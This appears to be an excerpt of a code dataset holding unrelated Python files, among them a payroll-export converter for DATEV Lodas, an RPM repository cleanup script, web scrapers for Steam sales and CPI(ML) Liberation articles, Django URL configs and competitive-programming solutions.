mutate=OnlyUniqueMutant()(mapping_all_mutate),\n select=selector,\n # initialize=mapping_default_initialize,\n initialize=lambda ctx, pop: mapping_heft_based_initialize(ctx, pop, heft_mapping, 3),\n stat=lambda pop: {\"hamming_distances\": hamming_distances([to_seq(p) for p in pop], to_seq(ms_ideal_ind)),\n \"unique_inds_count\": unique_individuals(pop),\n \"pcm\": pcm(pop),\n \"gdm\": gdm(pop)}\n\n ),\n Specie(name=ORDERING_SPECIE, fixed=True,\n representative_individual=ListBasedIndividual(os_representative))\n ],\n\n \"solstat\": lambda sols: {\"best_components\": hamming_for_best_components(sols, ms_ideal_ind, os_ideal_ind),\n \"best_components_itself\": best_components_itself(sols),\n \"best\": -1*Utility.makespan(build_schedule(_wf, estimator, rm, max(sols, key=lambda x: x.fitness)))\n },\n\n \"operators\": {\n # \"choose\": default_choose,\n \"build_solutions\": default_build_solutions,\n \"fitness\": fitness_mapping_and_ordering,\n # \"fitness\": overhead_fitness_mapping_and_ordering,\n # \"assign_credits\": default_assign_credits\n # \"assign_credits\": max_assign_credits\n \"assign_credits\": assign_from_transfer_overhead\n }\n }\n return do_experiment(saver, config, _wf, rm, estimator)\n\nif __name__ == \"__main__\":\n res = repeat(do_exp, 3)\n print(\"RESULTS: \")\n print(res)\n\n\n\n\n\n\n\n\n","sub_path":"heft/experiments/cga/cga_fixed_ordering.py","file_name":"cga_fixed_ordering.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"17727542","text":"#!/usr/bin/env python3\nfrom __future__ import annotations\nfrom typing import *\n\nimport distutils.version\nimport os\nimport re\n\nimport click\n\n\n# edgedb-server-1-alpha7-dev5124-1.0a7.dev5124+ged4e05af-2020101400nightly.el8.x86_64.rpm\nPACKAGE_RE = re.compile(\n r\"^(?P\\w+(-[a-zA-Z]+)*)\"\n r\"(?P-\\d+(-(alpha|beta|rc)\\d+)?(-dev\\d+)?)?\"\n r\"-(?P[^-]*)-(?P[^.]*)\"\n r\"(?P.*)?$\",\n re.A,\n)\nPACKAGE_NAME_NO_DEV_RE = re.compile(r\"([^-]+)((-[^-]+)*)-dev\\d+\")\n\n\n@click.command()\n@click.option(\"--keep\", type=int, default=3)\n@click.argument(\"path\")\ndef main(path: str, keep: int) -> None:\n index: Dict[str, List[Tuple[str, str]]] = {}\n for file in os.scandir(path):\n m = PACKAGE_RE.match(file.name)\n if not m:\n print(file.name, \"doesn't match PACKAGE_RE\")\n continue\n\n key_with_dev = f\"{m.group('basename')}{m.group('slot') or ''}\"\n key = PACKAGE_NAME_NO_DEV_RE.sub(r\"\\1\\2\", key_with_dev)\n\n version = f\"{m.group('version')}_{m.group('release')}\"\n index.setdefault(key, []).append((version, file.name))\n\n for _, versions in index.items():\n sorted_versions = list(\n sorted(\n versions,\n key=lambda v: distutils.version.LooseVersion(v[0]),\n reverse=True,\n )\n )\n\n for _ver, filename in sorted_versions[keep:]:\n print(\"Deleting outdated\", filename)\n os.unlink(os.path.join(path, filename))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"server/containers/rpmrepo/remove_old_dev_pkg.py","file_name":"remove_old_dev_pkg.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"499916920","text":"'''\r\n@Author: rishi\r\nhttps://cses.fi/problemset/task/1667\r\n'''\r\n# from QuickDS import format_2d_int_list\r\n\r\nfrom collections import defaultdict\r\n\r\n\r\ndef DFS(graph, n, visited, i = 1, d = 0, path = \"\"):\r\n if i == n:\r\n return [d, path]\r\n\r\n flag = False\r\n if not visited[i]:\r\n visited[i] = True\r\n array = []\r\n for curr in graph[i]:\r\n a = DFS(graph, n, visited, curr, d + 1, path +\" \"+ str(curr))\r\n if not a or a == [d, path]:\r\n continue\r\n else:\r\n flag = True\r\n array.append(a)\r\n visited[i] = False\r\n\r\n if flag:\r\n mini = array[0][0]\r\n d, path = array[0]\r\n for p, q in array:\r\n if p < mini:\r\n d, path = p, q\r\n return [d, path]\r\n else:\r\n return False\r\n\r\n\r\n\r\n\r\n\r\nn, m =list(map(int, input().split()))\r\nconnections = []\r\nfor i in range(m):\r\n connections.append(list(map(int, input().split(\" \"))))\r\nconnect = defaultdict(list)\r\nfor i,j in connections:\r\n connect[i].append(j)\r\n connect[j].append(i)\r\n# print(connect)\r\n\r\nvisited = {}\r\nfor i in range(1, n+1):\r\n visited[i] = False\r\n\r\n# {1: [2, 3, 4], 2: [1, 3], 3: [1, 2], 4: [1, 5], 5: [4]})\r\nans = DFS(connect, n, visited)\r\nif ans == False:\r\n print(\"IMPOSSIBLE\")\r\nelse:\r\n print(ans[0] + 1)\r\n print('1' + \" \".join(ans[1].split(\" \")))\r\n\r\n","sub_path":"CSES Problemset/message route.py","file_name":"message route.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"523565426","text":"# OMS2LODASV04b\n# Tool zum Import von Abrechnungsstammdaten aus OMS (regiocom|snt) nach Lodas\n\nfrom tkinter import *\nimport os, sys, logging, time \nfrom staatsang import staatkey\nfrom shutil import copyfile\n\ndef konvert():\n\n zaehlerfehler = 0\n zaehlerdatensatz = 0\n zaehlerwarning = 0\n # Prüfung ob Quelldatei vorhanden und Abbruch falls nicht\n if os.path.exists(\"daten\\\\omsexport.txt\"):\n pass\n else:\n a = \"Quelldatei omsexport.txt im Verzeichnis\\n\\\\daten\\\\ ist nicht vorhanden!\"\n hfarbe = \"#FF0000\"\n tfarbe = \"#000000\"\n label1[\"bg\"]=hfarbe\n label1[\"fg\"]=tfarbe\n label1[\"font\"]=\"Verdane 14\"\n label1[\"height\"]=5\n label1[\"width\"]=40\n label1[\"text\"]=str(a)\n return\n \n# Logbuchdatei erstellen\n ZielDatei = os.path.join(time.strftime('%Y%m%d_%H%M%S_'))\n Datum = os.path.join(time.strftime('%Y%m%d_'))\n\n logging.basicConfig(\n filename = (\"logbuch\\\\protokoll.log\"),\n level = logging.INFO,\n style = \"{\",\n format = \"{asctime} [{levelname:8}] {message}\",\n datefmt = \"%d.%m.%Y %H:%M:%S\")\n\n # Quelldatei öffnen \n filequelle=open(\"daten\\\\omsexport.txt\",\"r\", encoding='utf-8')\n logging.info(\"Datenquelle geöffnet für Kopfdaten\")\n\n #Beschreibung der Felder aus der Quelldatei\n #stelle 1 = BNR; stelle 2 = Mandantenr; stelle 3 = MM/JJJJ Abrechnungsmonat; stelle 4 = PNR; stelle 5 = Geschlecht;\n #stelle 6 = Name; stelle 7 = Vorname; stelle 8 = strasse; stelle 9 = Hausnummer; stelle 10 = Strasse_Zusatz; stelle 11 = PLZ;\n #stelle 12 = Ort; stelle 13 = Geburt; stelle 14 = staatsang.; stelle 15 = tech Eintritt; stelle 16 = WochenAZ; stelle 17 = Stellenbeschreibung;\n #stelle 18 = Kostenstelle stelle 19 = Steuer-ID stelle 20 = RV Nummer \n\n#neu 0.4a/b\n# stelle 21 = Leistungsgruppe\n# stelle 22 = Austrittsdatum\n#ende neu \n\n# for x in filequelle:\n# stelle1,stelle2,stelle3,stelle4,stelle5,stelle6,stelle7,stelle8,stelle9,stelle10,stelle11,stelle12,stelle13,stelle14,stelle15,stelle16,stelle17,stelle18,stelle19,stelle20=x.split(\"|\")\n# break\n\n#neu 0.4a/b\n for x in filequelle:\n stelle1,stelle2,stelle3,stelle4,stelle5,stelle6,stelle7,stelle8,stelle9,stelle10,stelle11,stelle12,stelle13,stelle14,stelle15,stelle16,stelle17,stelle18,stelle19,stelle20,stelle21,stelle22=x.split(\"|\")\n break\n\n\n\n filequelle.close()\n logging.info(\"Datenquelle gelesen und geschlossen\")\n\n # Zieldatei öffnen\n fileziel=open(\"daten\\\\\"+ZielDatei+stelle2+\"_Lodas_import.txt\",\"w\")\n logging.info(\"Zieldatei geöffnet\")\n\n # Zuordnung und Anlage von Kopfdaten\n mmstammdatengultigab = stelle3[0]+stelle3[1]\n jjstammdatengultigab = stelle3[3]+stelle3[4]+stelle3[5]+stelle3[6]\n beraternummer = stelle1\n mandantennummer = stelle2\n\n logging.info(\"Kopfdaten im DATEV Format für Lodas in Zieldatei schreiben\")\n\n # schreiben in Lodas Importdatei\n fileziel.write(\"[Allgemein]\\nZiel=LODAS\\nVersion_SST=1.0\\n* Version_DB=10.7\\nBeraterNr=\")\n fileziel.write(beraternummer)\n fileziel.write(\"\\nMandantenNr=\")\n fileziel.write(mandantennummer)\n fileziel.write(\"\\n* Datumsformat=TT/MM/JJJJ\\nStringbegrenzer='\\n* StammdatenGueltigAb=01/\")\n fileziel.write(mmstammdatengultigab)\n fileziel.write(\"/\")\n fileziel.write(jjstammdatengultigab)\n fileziel.write(\"\\n\\n* LEGENDE:\\n* Datei erzeugt mit Tool OMS2LODAS\\n* AP: Andreé Rosenkranz; andree.rosenkranz@datev.de\\n\\n* Satzbeschreibungen zur Anlage von Stammdaten für Mitarbeiter\\n\\n\")\n logging.info(\"Kopfdaten im DATEV Format für Lodas in Zieldatei geschrieben\")\n\n # schreiben der Satzarten\n logging.info(\"Satzarten im DATEV Format für Lodas in Zieldatei schreiben\")\n fileziel.write(\"[Satzbeschreibung]\")\n fileziel.write(\"\\n10;u_lod_psd_beschaeftigung;pnr#psd;eintrittdatum#psd;austrittdatum#psd;arbeitsverhaeltnis#psd;schriftl_befristung#psd;datum_urspr_befr#psd;abschl_befr_arbvertr#psd;verl_befr_arbvertr#psd;befr_gr_2_monate#psd;\")\n fileziel.write(\"\\n11;u_lod_psd_mitarbeiter;pnr#psd;duevo_familienname#psd;duevo_vorname#psd;adresse_strassenname#psd;adresse_strasse_nr#psd;adresse_ort#psd;adresse_plz#psd;staatsangehoerigkeit#psd;geburtsdatum_ttmmjj#psd;geschlecht#psd;familienstand#psd;sozialversicherung_nr#psd;adresse_anschriftenzusatz#psd;\")\n# fileziel.write(\"\\n12;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;stammkostenstelle#psd;\")\n#neu 0.4a\n fileziel.write(\"\\n12;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;stammkostenstelle#psd;leistungsgruppe#psd;\")\n fileziel.write(\"\\n13;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;\")\n fileziel.write(\"\\n14;u_lod_psd_steuer;pnr#psd;identifikationsnummer#psd;\")\n fileziel.write(\"\\n\\n\")\n fileziel.write(\"[Stammdaten]\")\n fileziel.write(\"\\n* Stammdaten zur Anlage von Mitarbeitern\\n\\n\")\n logging.info(\"Satzarten im DATEV Format für Lodas in Zieldatei geschrieben\")\n\n # Quelldatei öffnen\n filequelle=open(\"daten\\\\omsexport.txt\",\"r\", encoding='utf-8')\n logging.info(\"Datenquelle geöffnet\")\n logging.info(\"Beginne schreiben der Datensätze in Zieldatei\")\n\n #Beschreibung der Felder aus der Quelldatei\n #stelle 1 = BNR*; stelle 2 = Mandantenr*; stelle 3 = MM/JJJJ Abrechnungsmonat*; stelle 4 = PNR; stelle 5 = Geschlecht*;\n #stelle 6 = Name*; stelle 7 = Vorname*; stelle 8 = strasse*; stelle 9 = Hausnummer*; stelle 10 = Strasse_Zusatz*; stelle 11 = PLZ*;\n #stelle 12 = Ort*; stelle 13 = Geburt*; stelle 14 = staatsang.*; stelle 15 = tech Eintritt*; stelle 16 = WochenAZ*; stelle 17 = Stellenbeschreibung*;\n #stelle 18 = Kostenstelle; stelle 19 = Steuer-ID; stelle 20 = RV Nummer \n\n#neu 0.4a\n# stelle 21 = Leistungsgruppe\n# neu 0.4b\n# stelle 22 = Austrittsdatum \n# #ende neu \n\n for x in filequelle:\n# stelle1,stelle2,stelle3,stelle4,stelle5,stelle6,stelle7,stelle8,stelle9,stelle10,stelle11,stelle12,stelle13,stelle14,stelle15,stelle16,stelle17,stelle18,stelle19,stelle20=x.split(\"|\")\n# stelle20 = (stelle20.strip())\n#neu 0.4a/b\n stelle1,stelle2,stelle3,stelle4,stelle5,stelle6,stelle7,stelle8,stelle9,stelle10,stelle11,stelle12,stelle13,stelle14,stelle15,stelle16,stelle17,stelle18,stelle19,stelle20,stelle21,stelle22=x.split(\"|\")\n stelle22 = (stelle22.strip())\n # Wenn PNR falsch ist, dann keinen Datensatz schreiben\n if stelle4 < \"1\" or stelle4 > \"99999\":\n stelle4fehler=stelle4\n stelle4=\"0\"\n # Zuordnung Geschlecht - auch d/divers \n if stelle5 == \"w\" or stelle5 == \"W\":\n stelle5 = \"1\"\n elif stelle5 == \"m\" or stelle5 == \"M\":\n stelle5 = \"0\"\n elif stelle5 == \"d\" or stelle5 == \"D\" :\n stelle5 = \"2\"\n#neu 0.4a - Geschlecht u/unbestimmt\n elif stelle5 == \"u\" or stelle5 == \"U\":\n stelle5 = \"3\"\n#ende neu\n else:\n stelle5 = \"\"\n logging.warning(\"PNR:\\x20\"+stelle4+\"__\\x20__Das Geschlecht ist in den Quelldaten nicht mit m,M, w,W, d,D, u oder U angegeben. Das Geschlecht wir auf leer gesetzt.\")\n zaehlerwarning = zaehlerwarning+1\n # Zuordnung Staatsangehörigkeit - Zuordnung DATEV Schlüssel Staatsangehörigkeit über staatsang.py - Neu am 25.3.2019\n skey = staatkey\n if stelle14 in skey:\n stelle14=(skey[stelle14])\n else:\n stelle14 =\"\"\n logging.warning(\"PNR:\\x20\"+stelle4+\"__\\x20__Die Staatsangehörigkeit ist nicht im Dictonary -staatsang.py- angegeben. Das Feld Staatsangehörigkeit wird auf leer gesetzt.\") \n zaehlerwarning = zaehlerwarning+1\n # Ende Neu 25.3.2019\n # Eintrittsdatum (stelle15) auf korrekte Länge prüfen - Fehler erzeugen, wenn nicht 10 stellig \n stelle15fehler = len(stelle15)\n if stelle15fehler != 10:\n stelle15 = \"0\"\n else:\n pass\n # Geburtsdatum (stelle13) auf korrekte Länge prüfen - Fehler erzeugen, wenn nicht 10 stellig \n stelle13fehler = len(stelle13)\n if stelle13fehler != 10:\n stelle13 = \"0\"\n else:\n pass\n#neu 0.4a\n if stelle21 < \"1\" or stelle21 > \"5\":\n stelle21 = \"0\"\n logging.warning(\"PNR: \"+stelle4+\"__\\x20__Die Leistungsgruppe ist in den Quelldaten nicht mit 1, 2, 3, 4 oder 5 angegeben. Die Leistunggruppe wird auf 0 = keine Angabe gesetzt.\")\n zaehlerwarning = zaehlerwarning+1\n else:\n pass\n#ende\n #prüft ob Personalnummer, Geburtsdatum oder Eintritt 0 ist. Gibt Fehler aus. \n if stelle4 != (\"0\") and stelle13 != (\"0\") and stelle15 != (\"0\"):\n logging.info(\"Datensatz geschrieben: PNR \"+stelle4+\"__Eintritt:__\"+stelle15)\n fileziel.write(\"\\n10;\"+stelle4+\";\"+stelle15+\";;;;;;;\")\n fileziel.write(\"\\n11;\"+stelle4+\";'\"+stelle6+\"';'\"+stelle7+\"';'\"+stelle8+\"';'\"+stelle9+\"';'\"+stelle12+\"';\"+stelle11+\";\"+stelle14+\";\"+stelle13+\";\"+stelle5+\";;\"+stelle20+\";'\"+stelle10+\"';\")\n# fileziel.write(\"\\n12;\"+stelle4+\";'\"+stelle17+\"';\"+stelle18+\";\")\n#neu in 0.4a\n fileziel.write(\"\\n12;\"+stelle4+\";'\"+stelle17+\"';\"+stelle18+\";\"+stelle21+\";\")\n fileziel.write(\"\\n13;\"+stelle4+\";\"+stelle16+\";\")\n fileziel.write(\"\\n14;\"+stelle4+\";'\"+stelle19+\"';\")\n zaehlerdatensatz = zaehlerdatensatz+1\n# neu in 0.4b\n if stelle22 != \"\":\n fileziel.write(\"\\n[Hinweisdaten]\\nPNR: \"+stelle4+\" Austrittsdatum: \"+stelle22+\" wurde übergeben. Bitte Sachverhalt erfassen.\\n[Stammdaten]\\n\")\n else:\n pass\n\n elif stelle4 == \"0\":\n logging.error(\"Das Feld Personalnummer ist ohne Inhalt oder eine 0 oder mit \"+stelle4fehler+\" in der Exportdatei, es wurde kein Datensatz geschrieben.\")\n zaehlerfehler = zaehlerfehler+1\n elif stelle13 == \"0\":\n logging.error(\"PNR:_\"+stelle4+\"__\\x20__Das Feld Geburtsdatum ist nicht korrekt mit TT.MM.JJJJ gefüllt, kein Datensatz geschrieben.\")\n zaehlerfehler = zaehlerfehler+1\n elif stelle15 == \"0\":\n zaehlerfehler = zaehlerfehler+1\n logging.error(\"PNR:_\"+stelle4+\"__\\x20__Das Feld Eintrittsdatum ist nicht korrekt mit TT.MM.JJJJ gefüllt, kein Datensatz geschrieben.\")\n else:\n zaehlerfehler = zaehlerfehler+1\n logging.error(\"Das ist ein undefinierter Fehler - bei Bedarf an den Entwickler wenden\")\n\n logging.info(\"Datenkonvertierung beendet\")\n\n #Dateien schließen\t\n filequelle.close()\n fileziel.close()\n logging.info(\"Datenquelle und Ziel geschlossen.\")\n \n #Quelldatei sichern, umbennen mit Zeitstempel\n os.rename(\"daten\\\\omsexport.txt\",\"daten\\\\\"+(ZielDatei)+(stelle2)+\"omsexport.sic\")\n logging.info(\"Datenquelle in \"+(ZielDatei)+(stelle2)+\"omsexport.sic umbenannt.\")\n #Logdatei schliessen \n logging.info(\"logbuch schließen, kopieren und mit Zeitstempel speichern\")\n logging.shutdown()\n copyfile('logbuch/protokoll.log', 'logbuch/aktuelleslogbuch.log' )\n #Logdatei umbennen mit Zeitstempel \n os.rename(\"logbuch\\\\protokoll.log\", \"logbuch\\\\\"+(ZielDatei+stelle2)+\"protokoll.log\" )\n\n b = \"Es wurden \"+str(zaehlerdatensatz)+\" Datensätze geschrieben.\\nEs wurden \"+str(zaehlerwarning)+\" Warnungen gefunden.\\nEs wurden \"+str(zaehlerfehler)+\" Fehler gefunden!\\n Bitte prüfe das Logbuch im Verzeichnis logbuch!\"\n hfarbe = \"#00FF00\"\n tfarbe = \"#000000\"\n label1[\"bg\"]=hfarbe\n label1[\"fg\"]=tfarbe\n label1[\"font\"]=\"Verdane 14\"\n label1[\"height\"]=5\n label1[\"width\"]=40\n label1[\"text\"]=str(b)\n return\n\ndef leer():\n return\n\ndef exit():\n root.destroy()\n return\n\ndef quellcheck():\n if os.path.exists(\"daten\\\\omsexport.txt\"):\n # Datei ist vorhanden\n a = \"OK!\\nQuelldatei omsexport.txt im Verzeichnis \\n\\\\daten\\\\ ist vorhanden\"\n hfarbe = \"#00FF00\"\n tfarbe = \"#000000\"\n else:\n # Datei ist nicht vorhanden\n a = \"Quelldatei omsexport.txt im Verzeichnis \\n\\\\daten\\\\ ist nicht vorhanden!\"\n hfarbe = \"#FF0000\"\n tfarbe = \"#000000\"\n label1[\"bg\"]=hfarbe\n label1[\"fg\"]=tfarbe\n label1[\"font\"]=\"Verdane 14\"\n label1[\"height\"]=5\n label1[\"width\"]=40\n label1[\"text\"]=str(a)\n return\n\nroot = Tk()\n\n# Screen definieren\nwidth = 1366\nheight = 768\nroot.wm_geometry(\"%dx%d\" % (width,height))\n\n#Bild DATEV laden\nimg1 = PhotoImage (file=\"format/image001.png\")\n#label erstellen\nlabel2 = Label(root, image=img1)\nlabel1 = Label(root, text = \"Tool OMS2LODAS\", width=30, height=3, font=\"Verdana 12\") \n#Navigation als button definieren\nbutton1 = Button(root, text=\"Anleitung\", width=30, height=3, font=\"Verdana 12\", command= lambda:os.system('v04b_Handbuch_OMS2LODAS.pdf'), bg=\"#E6E6E6\")\nbutton2 = Button(root, text=\"Quelldatei vorhanden?\", width=30, height=3, font=\"Verdana 12\", command=quellcheck, bg=\"#E6E6E6\")\nbutton3 = Button(root, text=\"Daten Konvertierung\", width=30, height=3, font=\"Verdana 12\", command=konvert, bg=\"#E6E6E6\")\nbutton4 = Button(root, text=\"akt. Fehlerprotokoll überprüfen\", width=30, height=3, font=\"Verdana 12\", command= lambda:os.system('logbuch\\\\aktuelleslogbuch.log'), bg=\"#E6E6E6\")\nbutton5 = Button(root, text=\"Exit\", width=30, height=3, font=\"Verdana 12\", command=exit, bg=\"#E6E6E6\")\n\nroot.title(\"OMS2LODAS V0.4b\")\n\nlabel2.pack(side=TOP, pady=20)\nbutton1.pack(side=TOP,pady=2)\nbutton2.pack(side=TOP,pady=2)\nbutton3.pack(side=TOP,pady=2)\nbutton4.pack(side=TOP,pady=2)\nbutton5.pack(side=TOP,pady=2)\nlabel1.pack(pady=2)\nroot.iconbitmap(\"format/oms2lodas.ico\")\n\nroot.mainloop()","sub_path":"oms2lodas.py","file_name":"oms2lodas.py","file_ext":"py","file_size_in_byte":13019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"421696792","text":"from lexicon import Lexicon\n\nfrom .parser import Context, Argument\n\n\nclass Collection(object):\n def __init__(self):\n self.tasks = Lexicon()\n self.default = None\n\n def add_task(self, name, task, aliases=(), default=False):\n \"\"\"\n Adds callable object ``task`` to this collection under name ``name``.\n\n If ``aliases`` is given, will be used to set up additional aliases for\n this task.\n\n ``default`` may be set to ``True`` to set the task as this collection's\n default invocation.\n \"\"\"\n self.tasks[name] = task\n for alias in aliases:\n self.tasks.alias(alias, to=name)\n if default:\n if self.default:\n msg = \"'%s' cannot be the default because '%s' already is!\"\n raise ValueError(msg % (name, self.default))\n self.default = name\n\n def __getitem__(self, name=None):\n \"\"\"\n Returns task named ``name``. Honors aliases.\n\n If this collection has a default task, it is returned when ``name`` is\n empty or ``None``. If empty input is given and no task has been\n selected as the default, ValueError will be raised.\n \"\"\"\n if not name:\n if self.default:\n return self[self.default]\n else:\n raise ValueError(\"This collection has no default task.\")\n return self.tasks[name]\n\n\n def to_contexts(self):\n \"\"\"\n Returns all contained tasks and subtasks as a list of parser contexts.\n \"\"\"\n result = []\n for name, task in self.tasks.iteritems():\n context = Context(name=name, aliases=task.aliases)\n argspec = task.argspec\n for name, default in argspec.iteritems():\n # Handle arg options\n opts = {}\n if default is not None:\n opts['kind'] = type(default)\n # Handle aliases (auto shortflags, etc)\n names = [name]\n names.extend(argspec.aliases_of(name))\n # Create/add the argument\n context.add_arg(names=names, **opts)\n result.append(context)\n return result\n","sub_path":"invoke/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"339445222","text":"#!/usr/bin/python\n\n'''\nFile: make_rooms.py\nAuthor: Rachel Armstrong\nDate: 2011-04-13 08:28:11 BST\nDescription: Makes function calls to create rooms\n'''\n\nfrom room import Room\nfrom item import Item\n\ndef make_room(name, description, gold=0, exits=[0,0,0,0], items=[]):\n \"\"\"Makes a room based on input\"\"\"\n name = str(name)\n desc = str(description)\n gold = int(gold)\n room = Room(name)\n room.description = desc\n room.gold = gold\n room.exits = exits\n for i in items:\n room.items.append(i)\n return room\n","sub_path":"NAME/make_rooms.py","file_name":"make_rooms.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"365563907","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('registration/', views.registration_page,name='registration_page'),\n path('login/', views.login_page,name='login_page'),\n path('logout/', views.logout_user,name='logout'),\n\n\n\n path('', views.home,name='home'),\n path('products/', views.products,name='products'),\n path('info/', views.info,name='info'),\n path('customer/', views.customer,name='customers'),\n\n\n #create update related urls\n path('create_customer/',views.create_customer,name='create_customer'),\n path('create_product/',views.create_product,name='create_product'),\n path('create_order//',views.create_order_customer,name='create_order'),\n path('update_order//',views.update_order_customer,name='update_order'),\n path('delete_order//',views.delete_order_customer,name='delete_order'),\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"511712520","text":"# https://atcoder.jp/contests/abc070/tasks/abc070_b\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda :sys.stdin.readline().rstrip()\ndef resolve():\n a,b,c,d=map(int,input().split())\n print(max(0,min(d,b)-max(a,c)))\nresolve()\n","sub_path":"ABC070/b_two_switches.py","file_name":"b_two_switches.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"183755839","text":"from bs4 import BeautifulSoup as soup\nfrom urllib.request import urlopen as uReq\nfrom mongoengine import *\nfrom datetime import datetime\nfrom config import config\n\nbaseUrl = \"https://store.steampowered.com/search/?specials=1&page=\"\n\n# Connect to MongoDB\ndb = connect('steam-scrape', host=f'mongodb://ds145039.mlab.com', port=45039, username=config['username'], password=config['password'])\n\n\n# ===========================\n# Schema Class Definitions\n# ===========================\nclass Games(Document):\n gameName = StringField(required=True)\n platform = ListField(StringField())\n originalPrice = IntField(required=True)\n discountedPrice = ListField(DictField(), required=True)\n\n\n# ===========================\n# Secondary Functions\n# ===========================\ndef parsePlatforms(product):\n platforms = []\n platforms_raw = product.findAll(\"span\", \"platform_img\")\n for span in platforms_raw:\n if \"win\" in str(span):\n platforms.append(\"win\")\n if \"mac\" in str(span):\n platforms.append(\"mac\")\n if \"linux\" in str(span):\n platforms.append(\"linux\")\n return platforms\n\n\n# ===========================\n# Main Function\n# ===========================\ndef main():\n # Create connection, read raw html, close connection\n uClient = uReq(baseUrl + \"1\")\n page_html = uClient.read()\n uClient.close()\n\n # Parse the html\n page_soup = soup(page_html, \"html.parser\")\n\n # Grabs list of products\n search_results = page_soup.findAll(\"a\", {\"class\": \"search_result_row\"})\n\n for i, product in enumerate(search_results):\n try:\n name = product.find(\"span\", \"title\").text.strip()\n original_price = int(str(product.find(\"strike\")).replace(\"\", \"\").replace(\"\", \"\").replace(\"$\", \"\").replace(\".\", \"\"))\n sale_price = int(str(product.find(\"div\", \"search_price\").contents[3]).replace(\"$\", \"\").replace(\".\", \"\").strip())\n platforms = parsePlatforms(product)\n\n game_data = {\n \"gameName\": name,\n \"platform\": platforms,\n \"originalPrice\": original_price,\n \"discountedPrice\": [{\n \"date\": datetime.now(),\n \"price\": sale_price\n }],\n }\n\n if Games.objects(gameName=game_data['gameName']): # If there's already a db entry for the game title...\n # Push new price data\n updatedObject = (\n Games.objects(gameName=game_data['gameName'])\n .modify(push__discountedPrice=game_data[\"discountedPrice\"][0])\n )\n print(\"Updated\")\n else:\n # Create Games document and write to DB\n game = Games(gameName=game_data['gameName'])\n game.platform = game_data['platform']\n game.originalPrice = game_data['originalPrice']\n game.discountedPrice = game_data['discountedPrice']\n game.save()\n print(\"New game added to db\")\n\n except Exception as e:\n print(\"**********Problem with iteration \" + str(i) + \"**********\")\n print(e)\n\n # Close DB connection\n db.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"272464163","text":"from bs4 import BeautifulSoup\nimport requests\nfrom random import randint\n\ndef get_month(mo):\n op = ''\n if(mo == 'january'):\n op = '01'\n elif(mo == 'february'):\n op = '02'\n elif(mo == 'march'):\n op = '03'\n elif(mo == 'april'):\n op = '04'\n elif(mo == 'may'):\n op = '05'\n elif(mo == 'june'):\n op = '06'\n elif(mo == 'july'):\n op = '07'\n elif(mo == 'august'):\n op = '08'\n elif(mo == 'september'):\n op = '09'\n elif(mo == 'october'):\n op = '10'\n elif(mo == 'november'):\n op = '11'\n else:\n op = '12'\n return op\n\ndecade = ['2001-2010','liberation/2011-2020','liberation/2020/12/2021-2030']\n\nfor dec in decade:\n print('hi1')\n raw_years = requests.get(\"https://www.cpiml.net/\"+dec)\n print('hi2')\n soup_year = BeautifulSoup(raw_years.text,'lxml')\n yrs = soup_year.find_all('nav',{'role' : 'navigation', 'aria-labelledby':\"book-label-3\"})\n \n yrl = [yr['href'] for yr in yrs[0].find_all('a',href = True)]\n \n\n for yr in yrl:\n curr_yr = yr[len(yr)-4:]\n month_page = requests.get(\"https://www.cpiml.net/\"+yr)\n soup_month = BeautifulSoup(month_page.text,'lxml')\n month = soup_month.find_all('nav',{'role':'navigation','aria-labelledby':\"book-label-3\" })\n monthl = [mon['href'] for mon in month[0].find_all('a',href = True)]\n\n print('hi3')\n for mon in monthl:\n\n article_link_page = requests.get(\"https://www.cpiml.net/\"+mon)\n \n soup_article_link = BeautifulSoup(article_link_page.text,'lxml')\n\n curr_mon = soup_article_link.find('h1',class_ = 'page-header').text\n curr_mon = curr_mon.replace(curr_yr,'')\n curr_mon = curr_mon.replace('-','')\n curr_mon = curr_mon.replace('\\n','')\n articles = soup_article_link.find_all('nav',{'role':'navigation','aria-labelledby':\"book-label-3\" })\n \n articlel = [atc['href'] for atc in articles[0].find_all('a',href = True)]\n \n\n for article in articlel:\n art = requests.get(\"https://www.cpiml.net/\"+article)\n soup_article = BeautifulSoup(art.text,'lxml')\n\n fs = soup_article.find('h1',class_ = 'page-header').text\n fs+= soup_article.find('div',class_ = \"field field--name-body field--type-text-with-summary field--label-hidden field--item\").text\n monstr = get_month(curr_mon.lower())\n id = 't'+curr_yr+monstr+'01'+str(randint(100000,999999))\n f = open('new_data/'+id+'.txt','w')\n f.write(fs.encode('utf-8'))\n f.close()","sub_path":"workflow/extractionliberation1.py","file_name":"extractionliberation1.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"401206544","text":"from django.conf.urls import url\nfrom . import views\nfrom django.conf import settings\n# from django.conf.urls.static import static\n\nurlpatterns = [\nurl('^$', views.index, name = 'index'),\nurl('^location', views.location, name = 